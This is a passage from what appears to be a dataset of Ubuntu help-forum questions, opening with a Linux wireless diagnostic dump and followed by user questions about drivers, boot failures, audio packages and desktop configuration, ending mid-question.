driver : rtl8188ee state : disconnected default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points nariya : infra , < mac address removed > , freq 2412 mhz , rate 54 mb/s , strength 30 wpa wpa2 belkin.f9c.guests : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 30 balzafam : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 30 wpa wpa2 heather : infra , < mac address removed > , freq 2422 mhz , rate 54 mb/s , strength 27 wpa2 2wire826 : infra , < mac address removed > , freq 2442 mhz , rate 54 mb/s , strength 50 wep home-3b12 : infra , < mac address removed > , freq 2442 mhz , rate 54 mb/s , strength 30 wpa wpa2 belkin.f9c : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 74 wpa2 - device : eth0 [ auto ethernet ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : alx state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 10.42.0.80 prefix : 24 ( 255.255.255.0 ) gateway : 10.42.0.1 dns : 10.42.0.1 ***** networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false ***** interfaces ***** # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback ***** iwlist ***** wlan0 scan completed : cell 01 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=26/70 signal level=-84 dbm encryption key : on essid : '' '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000c004dd8539 extra : last beacon : 8ms ago ie : unknown : 0000 ie : unknown : 010482848b96 ie : unknown : 030101 ie : unknown : 2a0104 ie : unknown : 32080c1218243048606c cell 02 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=70/70 signal level=-18 dbm encryption key : on essid : '' nariya '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000c004dc85d0 extra : last beacon : 8ms ago ie : unknown : 00066e6172697961 ie : unknown : 010482848b96 ie : unknown : 030101 ie : unknown : 2a0104 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32080c1218243048606c ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk cell 03 - address : < mac address removed > channel:7 frequency:2.442 ghz ( channel 7 ) quality=70/70 signal level=27 dbm encryption key : on essid : '' home-3b12 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000023b7584b8b0 extra : last beacon : 8ms ago ie : unknown : 0009484f4d452d33423132 ie : unknown : 010882848b961224486c ie : unknown : 030107 ie : unknown : 2a0106 ie : unknown : 32048c98b060 ie : unknown : 2d1a0c0017ffff000000000000000000000000000000000000000000 ie : unknown : 3d1607030700000000000000000000000000000000000000 ie : unknown : 3e0100 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : 0b05060018127a ie : unknown : 7f0101 ie : unknown : dd07000c4303000000 ie : unknown : 0706555320010b10 ie : unknown : dd870050f204104a0001101044000102103b000103104700102880288028801880a880001dd2603b1010210005415252495310230006544738363247102400065254323836301042000831323334353637381054000800060050f204000110110012415252495320544738363220526f7574657210080002210c103c0001011049000600372a000120 cell 04 - address : < mac address removed > channel:7 frequency:2.442 ghz ( channel 7 ) quality=70/70 signal level=-18 dbm encryption key : on essid : '' '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000023b75863b69 extra : last beacon : 320ms ago ie : unknown : 0000 ie : unknown : 010882848b961224486c ie : unknown : 030107 ie : unknown : 32048c98b060 ie : unknown : 070c55532001010f0209110b010f ie : unknown : 050400010000 ie : unknown : 2a0106 ie : unknown : 2d1a0c0017ffff000000000000000000000000000000000000000000 ie : unknown : 3d1607030700000000000000000000000000000000000000 ie : unknown : 7f0101 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : 0b05060018127a ie : unknown : dd07000c4303000000 cell 05 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=70/70 signal level=16 dbm encryption key : on essid : '' belkin.f9c '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000007b9d76318 extra : last beacon : 8ms ago ie : unknown : 000a62656c6b696e2e663963 ie : unknown : 010882840b162430486c ie : unknown : 03010b ie : unknown : 2a0104 ie : unknown : 2f0104 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1abc191bffff000000000000000000000000000000000000000000 ie : unknown : 3d160b080400000000000000000000000000000000000000 ie : unknown : dd930050f204104a0001101044000102103b00010310470010a29e27421bfefb4c6b0106d76f61cf101021000642656c6b696e1023000a46394b313131372076311024000776312e302e303010420004323034301054000800060050f20400011011001c42656c6b696e20414339303020576972656c65737320526f75746572100800020004103c0001031049000600372a000120 ie : unknown : dd090010180201000c0000 ie : unknown : dd180050f2020101880003a4000027a4000042435e0062322f00 cell 06 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=70/70 signal level=20 dbm encryption key : off essid : '' belkin.f9c.guests '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000007b9d82a04 extra : last beacon : 8ms ago ie : unknown : 001162656c6b696e2e6639632e677565737473 ie : unknown : 010882840b162430486c ie : unknown : 03010b ie : unknown : 2a0106 ie : unknown : 2f0106 ie : unknown : 32040c121860 ie : unknown : 2d1abc191bffff000000000000000000000000000000000000000000 ie : unknown : 3d160b001700000000000000000000000000000000000000 ie : unknown : dd090010180200000c0000 ie : unknown : dd180050f2020101880003a4000027a4000042435e0062322f00 ***** resolv.conf ***** nameserver 127.0.1.1 ***** blacklist ***** [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac ***** modinfo ***** filename : /lib/modules/3.11.0-12-generic/kernel/drivers/net/wireless/rtlwifi/rtl8188ee/rtl8188ee.ko firmware : rtlwifi/rtl8188efw.bin description : realtek 8188e 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : zhiyuan_yang < zhiyuan_yang @ realsil.com.cn > srcversion : 3dc80afbd6dc9b10e085376 alias : pci : v000010ecd00008179sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , mac80211 intree : y vermagic : 3.11.0-12-generic smp mod_unload modversions parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.11.0-12-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 69021f8fc8bf76de7c8dd9c depends : mac80211 , rtlwifi intree : y vermagic : 3.11.0-12-generic smp mod_unload modversions filename : /lib/modules/3.11.0-12-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : e94c1fcab8071d430ac01c6 depends : mac80211 , cfg80211 intree : y vermagic : 3.11.0-12-generic smp mod_unload modversions ***** udev rules ***** # pci device 0x1969:0x10a1 ( alx ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8179 ( rtl8188ee ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' ***** dmesg ***** [ 23.595159 ] rtl8188ee : using firmware rtlwifi/rtl8188efw.bin [ 23.798541 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 23.798692 ] rtlwifi : wireless switch is on [ 26.522873 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 61.694964 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 63.618018 ] wlan0 : authenticate with < mac address removed > [ 63.637760 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 63.735593 ] wlan0 : authenticated [ 63.737619 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 63.809503 ] wlan0 : rx assocresp from < mac address removed > ( capab=0xc11 status=0 aid=7 ) [ 63.809674 ] wlan0 : associated [ 63.809700 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 73.722206 ] wlan0 : connection to ap < mac address removed > lost [ 78.189556 ] wlan0 : authenticate with < mac address removed > [ 78.209478 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 78.313237 ] wlan0 : send auth to < mac address removed > ( try 2/3 ) [ 78.417377 ] wlan0 : send auth to < mac address removed > ( try 3/3 ) [ 78.521571 ] wlan0 : authentication with < mac address removed > timed out [ 79.479341 ] wlan0 : authenticate with < mac address removed > [ 79.499204 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 79.593071 ] wlan0 : authenticated [ 79.595030 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 79.695423 ] wlan0 : rx assocresp from < mac address removed > ( capab=0xc11 status=0 aid=7 ) [ 79.695598 ] wlan0 : associated [ 90.639140 ] wlan0 : disassociating from < mac address removed > by local choice ( reason=3 ) [ 90.672951 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 93.651011 ] wlan0 : authenticate with < mac address removed > [ 93.670441 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 93.735967 ] wlan0 : authenticated [ 93.738150 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 93.840088 ] wlan0 : rx assocresp from < mac address removed > ( capab=0xc11 status=0 aid=7 ) [ 93.840246 ] wlan0 : associated [ 100.510648 ] wlan0 : deauthenticated from < mac address removed > ( reason : 15 ) [ 264.665782 ] rtl8188ee : rtl8188ee : fw power save off ( module option ) [ 264.665786 ] rtl8188ee : using firmware rtlwifi/rtl8188efw.bin [ 264.665889 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 264.666037 ] rtlwifi : wireless switch is on [ 265.069837 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 265.070265 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 273.670132 ] wlan0 : authenticate with < mac address removed > [ 273.689401 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 273.772564 ] wlan0 : authenticated [ 273.773146 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 273.806512 ] wlan0 : rx assocresp from < mac address removed > ( capab=0xc11 status=0 aid=7 ) [ 273.806609 ] wlan0 : associated [ 273.806622 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 280.547327 ] wlan0 : deauthenticated from < mac address removed > ( reason : 15 ) [ 283.335176 ] wlan0 : authenticate with < mac address removed > [ 283.354485 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 283.440054 ] wlan0 : authenticated [ 283.442207 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 283.481160 ] wlan0 : rx assocresp from < mac address removed > ( capab=0xc11 status=0 aid=7 ) [ 283.481254 ] wlan0 : associated [ 289.794112 ] wlan0 : deauthenticated from < mac address removed > ( reason : 15 ) ****************** done ******************
395394	gear menu - switch account does n't work	running ubuntu 13.10 . i open the gear menu , and see a list of users . clicking on them does nothing . should n't it allow me to switch accounts ? follow up : if i am logged in as a user that does n't have a password set , and i want to switch to a different user ( without log out ) , it seems that i do n't have a way to do this . the `` lock/switch account '' just causes the screen to go black for a second and then back in to the current user .
395396	basket note pads password and encryption does n't work at all , is it just me ?	when i right click and set password for a note , it accepts it , but then it never asks for it again . and the option to encrypt it with private key is grayed out . both options are advertised on their homepage , so i guess they are finished ? is it just me or someone else is having the same issue ? from my research it 's the most used note taking app for linux but still there is n't single mention about that issue anywhere .
395397	common access card remove coolkey	i installed coolkey to gain access to https sites using a common access card . for some reason firefox wont execute the final step . in reading your help file , it states to use cackey instead of coolkey . i want to ensure that i remove coolkey correctly first . what would the terminal command be ?
395400	display switches at start up	i recently installed ubuntu on a spare pc of mine and i plan on using it in conjunction with my hdtv and a webcam to skype relatives back home . i have run into an issue that i have n't been able to correct , though i 'm sure it 's a no-brainer . i have my pc connected via hdmi to my hdtv . when i boot up the system , and the ubuntu loading screen pops up , for a fraction of a second , i can see that the display output bar has popped up , and then the screen goes blank and my tv says no input found . i imagine that what 's happening is that ubuntu is defaulting to a different output , only there is n't any other except the hdmi . i have tried to use the fn+function keys to get it to switch back to the hdmi , but no luck . my only other alternative to lug a monitor down the stairs and hook that up and play with some settings , but i hope that wo n't be necessary . how to fix this ? i 'd really appreciate any insight . merry christmas !
395404	cant config my pwm fans	i have mb asus z87 expert , connected 4 pwm fans 4pin . when i run sensors-detect it only finds cpu fan . i cant find any solution to control my fans . when i run pwmconfig command , it says i have no pwm fans detected ... : / help me please
395405	does a dual boot with windows make ubuntu more prone to `` breaking '' ?	i 've been using ubuntu as my primary os on my laptop , but i 've been forced to dual boot it with windows because sometimes i 'm required to use software that only works on windows . i 've had a fair share of problems with ubuntu ( things like invalid arch independent elf magic , etc . ) using this setup . is the number of problems ubuntu has somehow related to windows ' presence ?
395410	drivers for atheros qca9565 / ar9565 wireless cardh	today i bought my new dell laptop with ubuntu 12.04 lts installed.everything was working fine untill i installed all the updates with the update manager and my wireless card ( atheros qca9565 / ar9565 ) stopped working.i tried various solutions i found on line but nothing worked . since i 'm new to linux i 'd like to find a simple way to download the appropriate drivers for my card and solve my problem .
395411	network manager cable unplugged in kubuntu 12.04	i have a desktop computer with a ga-e240n gigabyte motherboard and running kubuntu 12.04 . on this computer i connect to the internet by wire . because of stormy weather i decided to unplugged the internet cable and not use the computer the for the entire weekend . on monday i turned on the computer and my internet connection was gone . i was able to connect wireless from my laptop but the wired connection did n't work ( not even on my laptop ) . after changing the cable i was able to connect with my laptop by wire both booting from windows and kubuntu ( 12.04 ) so this ruled out the chance of being a cable/router issue , however i have n't being able to get my desktop connection back again . at the moment when i boot network manager says setting network address , but after it fails it says cable unplugged . it tries a couple of times but fails . so far i have tried : changing /etc/network/interfaces as suggested here : ( network is not working anymore - ubuntu 12.04 ) . configuring through network manager . copying /etc/network/ and /etc/networkmanager/ from my laptop to my desktop ( as suggested in the link pasted above ) . without any luck . i have found many posts with similar issues but no solution to my problem yet . here is the output from ifconfig and lshw : sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 06 serial : 94 : de:80 : a3:75:1a size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:40 ioport : de00 ( size=256 ) memory : fddff000-fddfffff memory : fddf8000-fddfbfff ifconfig eth0 link encap : ethernet hwaddr 94 : de:80 : a3:75:1a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:163 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:29364 ( 29.3 kb ) interrupt:40 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2176 errors:0 dropped:0 overruns:0 frame:0 tx packets:2176 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:170160 ( 170.1 kb ) tx bytes:170160 ( 170.1 kb ) anymore information needed just let me know and any suggestions would be much welcomed . how can i fix this ?
395412	dual booting tips ( asus 1015e-ds02 )	i have an asus 1015e-ds02 which has ubuntu 10.4 preinstalled . i would like to dual boot ubuntu with windows 7 ( or 8 whichever can support my wireless card ) . i snooped around for some help on this site and i went on gparted to check out the partitions . this is a screenshot of my current hd untouched , however i am not 100 % sure which partition is safe to delete . any tips or advice would be greatly appreciated ! thank you !
395413	installed some new software and added a user , now my first user crashes x and ca n't login	i am running xubuntu 12.04 . i installed dogecoind and made a new user called dogecoin . my first user , james , used to be the only one . it used to be set to auto log in . now i have a choice between my two users and guest . if i try to login as james the screen flashes black and resets , then sends me back to login . i can still login fine with the others . i can login to james through ssh where i tried to reset my x config files . it did n't seem to help . sudo aticonfig -- adapter=all -f -- initial it says : no protocol specified no protocol specified uninitialised file found , configuring . using `/etc/x11/xorg.conf` saving back-up to /etc/x11/xorg.conf.fglrx-6 pacman -qi linux says : no protocol specified no protocol specified no display possible i am trying to use two graphics cards , but i ca n't even login !
395414	how to install alsa-base and pulseaudio ?	i was having a sound issue where sound settings show `` dummy output '' meaning it was n't reading my audio card . i followed this instructions here , got to the `` alternate '' method , ran `` sudo apt-get remove -- purge alsa-base pulseaudio '' , but `` sudo apt-get install alsa-base pulseaudio '' shows me this : reading package lists ... done building dependency tree reading state information ... done package pulseaudio is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package alsa-base is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'alsa-base ' has no installation candidate e : package 'pulseaudio ' has no installation candidate no i do n't even have a sound icon . how can i install these two packages ?
395420	ubuntu 13.10 soft mouse scrolling	iâ´ve just installed ubuntu and i realized that whe i scroll with the middle wheel of the mouse , in any application , the page to be scrolled moved quite fast . like a jump.is there any way to configure this as a soft scrolling , that seem more natural and dont jump and entire page ? thanks !
395422	use gpicview to scroll between all images in a directory using mouse or keyboard like arrows or pageup	with gpicview 0.2.3 and lubuntu 13.04 running lxde , the next/previous function never seems to work . keyboard shortcuts show that the arrow keys should move between next and previous images , but nothing happens . clicking on the gui arrows does nothing . selecting multiple images on opening the program does not change the behavior . i am working with a directory of ~2mb jpg images on the internal hard drive . they were taken with an android nexus 4 . opening single images works great , but each image must be opened individually . this is quite frustrating . any ideas ? alternative image browsers may be the solution . apt-cache policy gpicview shows installed : 0.2.3+git20130101-0ubuntu1 screenshot : http : //dl.dropbox.com/u/11744656/selection_142.png
395428	laptop does not suspend when lid is closed	i 'm a new ubuntu 13.10 user . closing the lid of my laptop does not result in the computer entering suspend mode , meaning each time i close my lid without manually suspending the computer the battery dies . the proper settings are set in power management -- suspend the laptop on lid close for both ac and dc , but these do not have an effect on actual behavior . it looks like this is a common problem for many users as far back as ubuntu 11 -- the only solution i could find is the below . however , as a new linux user i 'm not aware of how to actually execute the instructions . if someone could provide additional detail that would be tremendously helpful . thanks in advance . /etc/acpi/events/lidbtn triggers /etc/acpi/lid.sh which triggers /etc/acpi/local/lid.sh.post at the end of the script . /etc/acpi/local/* allows you to add your own config ( e.g . required for wmii ) . generate /etc/acpi/local/lid.sh.post make it executable and add : # ! /bin/bash grep -q closed /proc/acpi/button/lid/*/state if [ $ ? = 0 ] then /usr/sbin/pm-suspend fi wmii will now go to suspend mode when closing the lid . it'll automatically wake up when opening the lid .
395429	panasonic toughbook cf-w2a recomended flavor ?	i have a very old panasonic toughbook cf-w2a with a 40gb hdd , and only 512mb of ram . will ubuntu run on it ? i 'm trying to find an alternative to getting rid of it and would love to give it to my 5 year old .
395432	ubuntu to xubuntu	i 'm new on ubuntu , and it 's slow in my computer . i heard that xubuntu is faster than ubuntu , how can i change the desktops without losing my information ?
395433	installing utorrent server glibc_2.16 not found	i tried nrly everything to fix this problem , but i 'm a linux-noob so maybe it 's me who does something wrong . basicly i get this error_ sudo utserver -settingspath /opt/utorrent-server-alpha-v3_3/ utserver : /lib/i386-linux-gnu/libc.so.6 : version `glibc_2.16 ' not found ( required by utserver ) i tried to install build-essentiels and libssl0.9.8 but it still says glibc2.16 not found . what can i do to install glibc step-by-step to get utorrent server to work ? using ubuntu 12.04 thanks for the help and merry christmas everyone !
395434	installing full kde from minimal iso vs live cd	i 'm talking about doing kde installation from minimal iso + tasksel versus kde live cd . would these 2 different method of installations give you 1 to 1 identical kubuntu os and configuration in the end ?
395435	ubuntu 12.04 lts not booting after kvm disabled error messages	i have installed ubuntu 12.04 lts and it was working fine for a long time . then it said some error messages like : 7.656566 kvm disabled then , it just goes to a black screen and does not boot . how can i fix this ?
395436	how to set up an autoupdated blacklist for dansguardian ?	i 'm having issues setting up dansguardian on my computer with ubuntu 13.10 . i 'm trying to follow the steps in the ubuntu community documentation for dansguardian : https : //help.ubuntu.com/community/dansguardian i installed the programs it specified via terminal command with no errors . then i downloaded the blacklists from http : //urlblacklist.com/ ? sec=download and extracted the files . the next step is to run : tar -xzf bigblacklist.tar.gz i tried running that command , but get this response : john-hill @ johnhill-desktop : ~ $ tar -xzf bigblacklist.tar.gz tar ( child ) : bigblacklist.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now john-hill @ johnhill-desktop : ~ $ any ideas ? or is there a better way to set up the blacklists ? any help is appreciated .
395437	using in game ads	hi guys just a simple question , i made a game and would like to publish it to ubuntu app store , but i am not charging for the game and would like to make some profit , am i allowed to use in game advertising to generate revenue ? kind regards taras
395447	another black screen after nvidia driver installing	i 'm quite new on ubuntu , and this is my firt post here on the forum , even if i read it a lot . i 've installed the lastest nvidia driver for my graphic card ( a .run file ) , i 've followed nvidia instructions ( http : //us.download.nvidia.com/xfree86/linux-x86/331.20/readme/index.html ) and placed .run file in home , than i ctrl+alt+f1 : cd ~ sudo source lightdm stop sudo sh nvidia-linux-x86-133.20.run # ( and i installed the driver ) sudo source lightdm start after doing this every time i switch on the pc after the booting screen i can see just a black screen with a flashing underscore and i ca n't do anything , even open the terminal with ctrl+alt+f ( n ) . i no longer see an nvidia logo after the booting screen . i tried to use recovery mode and ( with `` drop to root shell prompt '' mode ) type sudo source lightdm start , but it gave me an error , than i tryied sudo rm /etc/x11/xorg.conf , but it could n't find the file , than i tried to uninstall and reinstall anything related to nvidia as shown here : blank screen after installing nvidia restricted driver , but nothing . what should i try in your opinion ?
395449	why does the mbr return a different offset than ubuntu 's commands ?	~ $ sudo /sbin/fdisk -l /dev/sda | grep sda [ 0-9 ] /dev/sda1 * 2048 234133503 117065728 83 linux /dev/sda2 234135550 250068991 7966721 5 extended /dev/sda5 234135552 250068991 7966720 82 linux swap / solaris ~ $ cat /sys/block/sda/sda1/start 2048 ~ $ sudo hexdump -s 446 -n 64 /dev/sda 00001be 2080 0021 fe83 ffff 0800 0000 9000 0df4 00001ce fe00 ffff fe05 ffff 9ffe 0df4 2002 00f3 00001de 0000 0000 0000 0000 0000 0000 0000 0000 * 00001fe the last command is meant to dump the mbr . you can see from the second to last int ( 0800 0000 ) which is little endian , that it encodes 8 . 8*512=4098 which is not the 2048 reported by the two other commands . why is that different ?
395454	windows 8 install no disc/usb	i absolutely abhor windows 8 . i wanted to install ubuntu , so i downloaded it and it took me to a bundle of folders . i went back to read the specific instructions for the download , and the first section implies that i will either be using a usb or disc . my computer does n't have a disc drive and i do n't own a usb . i googled how to download it without using a disc or usb , and it directs me to a video how to do it on windows 7 . is it impossible for me to download ubuntu then ? i want it to replace windows 8 , not `` dual boot '' with it . the computer is new and has nothing on it , i will not be losing anything .
395458	how to enable unity-greeter in ubuntu 12.04 ?	if you want a different session for the default , you can modify this option . manually add the following line in the [ seatdefaults ] section of ( sudo gedit ) /etc/lightdm/lightdm.conf : [ seatdefaults ] user-session=true greeter-theme=unity greeter-session=unity-greeter user-session=ubuntu.desktop the list of user sessions is in /usr/share/xsessions , although even that location is configurable .
395465	after update to precise , libc looks hosed and ca n't update ?	looks like libc is hosed and ldconfig is segfaulting left and right causing issues ... output when i try to run apt-get install -- reinstall libc6 to reinstall libc ( and hopefully ldconfig ... ) : dpkg : error processing fglrx-updates ( -- confiugre ) : subprocess installed post-installation script returned error exit status 139 processing triggers for libc-bin ... ldconfig deferred processing now taking place segmentation fault ( core dumped ) /sbin/ldconfig.real : path `/lib/x86_64-linux-gnu ' given more than once /sbin/ldconfig.real : path `/usr/lib/x86_64-linux-gnu ' given more than once segmentation fault ( core dumped ) dpkg : error processing libc-bin ( -- configure ) : subprocess installed post-installation script returned error exit status 139 no apport report written because maxreports is reached already errors were encountered while processing : libgl1-mesa-glx libgl1-mesa-glx : i386 libqt4-opengl libqt4-opengl : i386 fglrx-updates libc-bin other debug info i figure you want : $ uname -a linux linux 3.2.0-25-generic # 40-ubuntu smp wed may 23 20:30:51 utc 2012 x86_64 gnu/linux $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04..3 lts release : 12.04 codename : precise any help would be greatly appreciated , i 'd love to get my box up and running again . edit : sent myself further down ... i noticed that the name for the architecture for my processor ( intel i7 ) had changed , from x86_64 to amd64 . so i figured , hey , just apt-get install -- reinstall linux and i 'm good , yea ? now i just have a grub prompt . i can ls and see my drives . what do i do now : (
395471	how to open adhaar card in adobe reader with singed validate	i am indian and in small business of adhaar card and i ca n't open the singed pdf document in adobe reader in ubuntu 12.04.3 lts and there is no alternative that open pdf and validate the signature . so anybody tell me what to do and how to ?
395473	how to edit /etc/security/group.conf for ldap client ?	this help.ubuntu.com article says the following . but it is not clear to me what to verify . groups does not return 'audio ' in my system . should i remove it from the line ? to assign local groups to a domain ( ldap ) user do the following edit /etc/security/group.conf and add something like the following to it ( log in as a local user and run the groups command to verify what to add ) : * ; * ; * ; al0000-2400 ; audio , cdrom , dialout , floppy
395475	ubuntu 12.04 how to edit .py file in idle without invoking the python shell ?	first , i followed this answer to modify the file mimeapps.list . how do i set idle as the default editor for python scripts ? it works , but not perfect because everytime i right click .py file -- select `` open with idle '' -- a python shell shows alongside the editor . the following picture show the result of opening two .py files . thanks in advance . update , as the idle appears in right-click menu , i donot run the commands : gksudo gedit /usr/share/applications/idle.desktop and exec=/usr/bin/idle -n % f ( no need to do this )
395481	how to get amazon insant video to work	i 've been racking my brain over this . youtube works just fine - but amazon instant video goes through its loading animation then just sits there and does n't play any video . i can still see all the controls pause/skip forward , etc except where the video would normally play . i also followed the instructions here : how to watch videos in amazon prime instant video ? however , i had no luck . thanks for any help/sage advice anyone can lend . also , i am running 64 bit ubuntu 13.04 , 4gb ram , intel i3 1.80ghz , intel ivybridge movile gpu
395482	language problem is causing updatting problem !	i searched so much but still have n't found any serious answer for this . i installed ubuntu 13.10 in english and i changed later the system language in greek . so everything turned into greek . when i had to update the flash player in order to work better i had to write in the terminal some orders to open ( through the terminal ) my folders so i could open-decompress what i had downloaded to update the adobe flash player . when i changed the system language back to english the directory folders , such as music , documents , pictures and videos did n't translated back in english . that means that i still ca n't update adobe flash player because i was so bad to dare to change the language . please help me . i 've already been trying to find a solution for more than 6 hours . the best solution would be to find a way to fully translate the pc in english so i do n't have the same problem in the future again using the terminal . by the way when i choosed `` greek language '' i was asked if i want to change also the folders and i pressed yes . plus , i choosed not to be asked again this question . what is going on ? is there any 